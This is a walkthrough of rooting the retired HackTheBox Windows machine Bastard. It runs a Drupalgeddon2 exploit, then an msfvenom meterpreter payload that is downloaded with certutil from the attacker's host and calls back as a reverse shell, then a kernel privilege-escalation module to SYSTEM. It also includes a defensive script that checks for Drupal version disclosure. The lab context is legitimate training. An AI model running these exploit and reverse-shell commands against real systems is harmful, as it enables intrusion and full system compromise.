Bastard HackTheBox WalkThrough
This is the Bastard HackTheBox machine walkthrough, and it is also the 6th machine of our OSCP-like HTB boxes series. In this writeup, I have demonstrated step by step how I rooted the Bastard HTB machine.
Before starting, let us know something about this machine. It is a Windows machine with IP address 10.10.10.9 and difficulty medium, as assigned by its maker. This machine is currently retired, so you will require a VIP subscription at hackthebox.eu to access it. Before starting, connect your PC to the VPN and make sure of your connectivity with the Bastard machine by pinging the IP 10.10.10.9. If all goes correctly, then start hacking. As usual, I started by scanning the machine. I used Nmap [a popular port scanner] for this task, and the result is below:
Scanning
$ nmap -sC -sV -oN bastard.nmap 10.10.10.9
Nmap revealed that ports 80, 135 and 49154 are open. A Microsoft IIS 7 web server is running on port 80, and the Microsoft RPC service is running on ports 135 and 49154. The Nmap script http-generator revealed that the website is built on the Drupal CMS [Drupal is a Content Management System, like WordPress] and that its major version is 7. As soon as I identify a piece of software and its version, I immediately search for a public exploit using searchsploit. Searchsploit listed a large number of potential exploits. However, the problem is that with so many exploits we do not know which one will surely work. To filter out the most appropriate one, I had to know the exact version of the Drupal instance running on port 80. After some googling, I found this answer on Stack Overflow: on going to the URL http://10.10.10.9/CHANGELOG.txt, I found that the installed version is 7.54.
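The CHANGELOG.txt trick above works because Drupal 7 ships that file in the web root with the newest release listed first, so anyone who can read it learns the exact patch level. The following added example (mine, not code from the original post) is the defender-side version of the same check: given the HTTP status and body of a request for CHANGELOG.txt, it reports whether the file is publicly readable and whether the disclosed version is below a minimum you set. The CHANGELOG sample and the minimum version used in the usage call are constructed, hypothetical values.

```python
"""Defender-side check for Drupal version disclosure via CHANGELOG.txt.

Added example for this writeup, not part of the original post. The
CHANGELOG text below is constructed to match the real file's layout
(newest release first, "Drupal X.Y, YYYY-MM-DD" on a line of its own),
and REQUIRED_MINIMUM is a hypothetical policy value, not a statement
about which Drupal release fixes any particular bug.
"""
import re
import urllib.request

# Constructed sample in the layout Drupal 7 uses for CHANGELOG.txt.
SAMPLE_CHANGELOG = """Drupal 7.54, 2017-02-01
-----------------------
- Fixed a bug (constructed entry).

Drupal 7.53, 2016-12-07
-----------------------
- Fixed another bug (constructed entry).
"""

# Hypothetical minimum version your own patch policy requires.
REQUIRED_MINIMUM = (7, 60, 0)

VERSION_RE = re.compile(r"^Drupal (\d+)\.(\d+)(?:\.(\d+))?,", re.M)


def parse_drupal_version(changelog_text):
    """Return the newest version listed in a Drupal 7 CHANGELOG.txt as a
    (major, minor, patch) tuple, or None if no version line is found.
    The file lists releases newest-first, so the first match is the
    installed release."""
    match = VERSION_RE.search(changelog_text)
    if match is None:
        return None
    major, minor, patch = match.groups()
    return (int(major), int(minor), int(patch or 0))


def version_str(version):
    """Format a version tuple as it would appear in CHANGELOG.txt."""
    return ".".join(str(part) for part in version)


def assess_changelog(status_code, body, minimum_version):
    """Turn one HTTP response for /CHANGELOG.txt into a list of findings.
    A non-200 response means nothing was disclosed, so no findings."""
    findings = []
    if status_code != 200:
        return findings
    findings.append("CHANGELOG.txt is publicly readable (exact version disclosure)")
    version = parse_drupal_version(body)
    if version is None:
        findings.append("could not parse a version from CHANGELOG.txt; review manually")
    elif version < minimum_version:
        findings.append(
            f"Drupal {version_str(version)} is below the required minimum "
            f"{version_str(minimum_version)}"
        )
    return findings


def fetch_changelog(base_url, timeout=10):
    """Fetch /CHANGELOG.txt from a site you operate and return
    (status_code, body). Only used when run against a live host."""
    url = base_url.rstrip("/") + "/CHANGELOG.txt"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, ""


if __name__ == "__main__":
    # Offline run on the constructed sample; swap in fetch_changelog(...)
    # for a host you are responsible for.
    for finding in assess_changelog(200, SAMPLE_CHANGELOG, REQUIRED_MINIMUM):
        print("finding:", finding)
```

The cheap fix on the server side is to delete or block CHANGELOG.txt (and the other text files Drupal ships in the web root) so the exact release is not readable, and to keep the install at a version your patch policy accepts; the check above lets you confirm both from the outside.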
Then I queried searchsploit again, and this time it found 8 potential exploits.
$ searchsploit drupal 7.54
After trying each of them, I found that only 44449.rb worked for me. For more info about this exploit, you can check here. Then I mirrored the exploit to my current directory using the -m switch of searchsploit.
$ searchsploit -m php/webapps/44449.rb
The file 44449.rb is currently in DOS format, so I converted it into UNIX format using the command dos2unix.
$ dos2unix 44449.rb
Ran this exploit to get a user shell.
Getting User Shell
$ ruby 44449.rb http://10.10.10.9
drupalgeddon2 >> whoami
Note: If you get an error like the one shown in the screenshot, it is due to a missing gem named highline in your gem directory. To solve this, install the gem with the command: $ sudo gem install highline
We got a user shell as the user named iusr. Right now we are in a fake cmd shell, which has limited functionality, and we cannot capture the user flag because this shell restricts execution of the type command. So I upgraded the shell to a meterpreter shell by dropping a payload created with msfvenom onto the Bastard machine and then catching the meterpreter shell on my listener in msfconsole.
Upgrading Shell
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4321 -f exe > shell.exe
# This will create an exe payload on our local PC
$ python3 -m http.server 80
# Start a python http server to host this shell.exe file
drupalgeddon2>> certutil.exe -urlcache -split -f "http://10.10.14.8/shell.exe" shell.exe
# This will download the payload to the Bastard machine.
Started the listener on msfconsole to get the reverse shell back:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.14.8
msf5 exploit(multi/handler) > set LPORT 4321
msf5 exploit(multi/handler) > exploit
meterpreter > sysinfo
We have successfully upgraded our shell to a meterpreter shell. Now we have many options to play with in our meterpreter shell.
Capture User Flag
meterpreter > cat 'C:\Users\dimitris\Desktop\user.txt'
Privilege Escalation
To escalate privilege to admin, we first have to find a privilege escalation vector. Then, using that PrivEsc vector, we exploit the machine to get an admin-privileged shell. To find the PrivEsc vector, I ran the post-exploitation module post/multi/recon/local_exploit_suggester, which gathers all the exploit modules that can be used to escalate privilege. Basically, it enumerates all the potential kernel exploits whose patch is not installed on the Bastard machine.
Finding PrivEsc Vector
meterpreter > run post/multi/recon/local_exploit_suggester
Local Exploit Suggester gave 5 exploits that can be used to get an admin shell. I tried each of them one by one, and only the exploit/windows/local/ms16_014_wmi_recv_notif module worked. So here, our PrivEsc vector is a kernel exploit.
Getting Root Shell
meterpreter > background
msf5 exploit(multi/handler) > use exploit/windows/local/ms16_014_wmi_recv_notif
msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > set SESSION 1
msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > set LHOST 10.10.14.8
msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > exploit
meterpreter > getuid
We are NT AUTHORITY\SYSTEM. Let us capture the root flag.
Capture Root Flag
meterpreter > cat /Users/Administrator/Desktop/root.txt.txt
This was how I rooted the Bastard HackTheBox machine. I learnt a lot hunting this box, and I hope you have also learnt some new things from it. Thanks for reading this writeup. Write about your experience in the comment section. For any suggestion or query related to the walkthrough, feel free to write to us at [email protected].
Next machine walkthrough is Arctic.